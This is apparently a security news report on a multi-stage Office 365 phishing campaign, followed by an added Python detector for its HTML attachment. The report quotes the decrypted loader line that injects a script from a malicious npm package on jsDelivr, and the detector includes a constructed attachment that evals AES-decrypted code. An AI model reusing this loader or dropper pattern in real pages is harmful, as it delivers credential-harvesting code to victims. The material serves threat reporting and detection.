A sophisticated phishing campaign targeting Microsoft Office 365 users has emerged, combining several advanced techniques to evade detection and harvest credentials.
The attack, identified in early April 2025, leverages encrypted HTML files, content delivery networks (CDNs), and malicious npm packages in a multi-stage approach that cybersecurity experts describe as unusually complex for typical phishing operations.
The attack begins innocuously with an email purporting to contain financial information, specifically an “EFT-PMT.htm” file disguised as payment documentation.
Unlike conventional phishing attempts that rely on obvious redirects or suspicious attachments, this campaign employs Advanced Encryption Standard (AES) encryption to conceal its malicious payload, representing a significant evolution in threat actor methodologies.
Fortra researchers identified the attack through their Suspicious Email Analysis (SEA) team, noting that while each individual technique has been observed before, this marks the first documented instance where these particular methods have been combined to deliver a Microsoft O365 phishing attack.
The researchers emphasized that the attack demonstrates how threat actors are increasingly abusing open-source repositories to conduct sophisticated campaigns.
Upon opening the seemingly harmless HTML attachment, victims unknowingly activate a hidden script that connects to an npm package hosted on a legitimate CDN (jsDelivr), further masking the malicious activity behind trusted infrastructure.
The attack’s technical complexity and use of developer tooling represent a concerning trend in phishing tactics that target both technical and non-technical users.
Infection Mechanism Analysis
The core of this attack’s sophistication lies in its multi-layered infection mechanism. When the victim opens the HTML attachment, they activate code containing an encrypted string stored in a variable named “encryptedAthens.”
The use of AES is particularly notable: it is rarely employed in phishing campaigns, which generally rely on simpler obfuscation techniques.
When decrypted, the hidden code reveals a script insertion command: let geog = document.createElement('script'); geog.type = 'text/javascript'; geog.src = 'https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS'; document.head.appendChild(geog);
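As an added illustration from the defender's side (not code from the article or from Fortra), the following static checks flag both stages described above: the attachment, where only the in-browser AES decryption, the execute-what-was-decrypted step and an opaque high-entropy string are visible, and the decrypted command, where the dynamic script element and the npm CDN source appear. The attachment sample is constructed; the "Salted__" header check assumes CryptoJS passphrase-mode AES, which the article does not confirm.

```python
import math
import re
from collections import Counter
# Static indicators for the two stages described above: the HTML attachment,
# and the script-insertion command that appears only after decryption.
INDICATORS = {
    "aes_decrypt_in_browser": re.compile(r"CryptoJS\.AES\.decrypt|AES\.decrypt\("),
    "decrypted_code_execution": re.compile(r"\beval\(|new\s+Function\("),
    # "U2FsdGVkX1" is base64 for "Salted__", the CryptoJS passphrase-mode header (assumed library).
    "cryptojs_salted_ciphertext": re.compile(r"U2FsdGVkX1"),
    "dynamic_script_injection": re.compile(r"createElement\(\s*['\"]script['\"]\s*\)"),
    "npm_cdn_script_source": re.compile(r"https?://cdn\.jsdelivr\.net/npm/"),
}
BLOB_RE = re.compile(r"""["']([A-Za-z0-9+/=]{64,})["']""")

# Constructed attachment modelled on the campaign; the blob is random filler. No CDN URL here: it exists only after decryption.
ATTACHMENT_SAMPLE = """<html><body><p>Your payment advice is attached.</p>
<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js"></script>
<script>
var encryptedAthens = "U2FsdGVkX1+3kQ9rZv8bT0pWm2xL7yH4cJ1dN6fA9sQeR5tY8uI2oP0aS3dF6gH9jK1lM4nB7vC2xZ5qW8eR==";
eval(CryptoJS.AES.decrypt(encryptedAthens, "k3y").toString(CryptoJS.enc.Utf8));
</script></body></html>"""
# The decrypted second stage as quoted in the article (quote character fixed).
DECRYPTED_STAGE = ("let geog = document.createElement('script');geog.type = 'text/javascript';"
                   "geog.src = 'https://cdn.jsdelivr.net/npm/citiycar8@2.1.9/MOMENTUM/NOW.API.JS';"
                   " document.head.appendChild(geog);")

def shannon_entropy(s: str) -> float:
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def scan_html(text: str) -> set:
    """Return the indicator names found in one stage (attachment or decrypted code)."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    # A long string literal with near-random content is the encrypted payload itself.
    if any(shannon_entropy(b) > 4.5 for b in BLOB_RE.findall(text)):
        hits.add("high_entropy_string_literal")
    return hits

def verdict(hits: set) -> str:
    # Decrypt-then-execute in the attachment, or npm-CDN script injection in the decrypted stage, quarantines.
    strong = {"aes_decrypt_in_browser", "decrypted_code_execution", "high_entropy_string_literal"}
    if len(hits & strong) >= 2 or {"dynamic_script_injection", "npm_cdn_script_source"} <= hits:
        return "quarantine"
    return "review" if hits else "clean"

if __name__ == "__main__":
    for label, stage in (("attachment", ATTACHMENT_SAMPLE), ("decrypted stage", DECRYPTED_STAGE)):
        hits = scan_html(stage)
        print(f"{label}: {verdict(hits)} {sorted(hits)}")
```

The point to take from running it is that the CDN indicator never fires on the attachment itself; a mail gateway needs the decryption-plus-execution pattern, and a proxy or CSP needs the jsDelivr npm rule, to cover both stages.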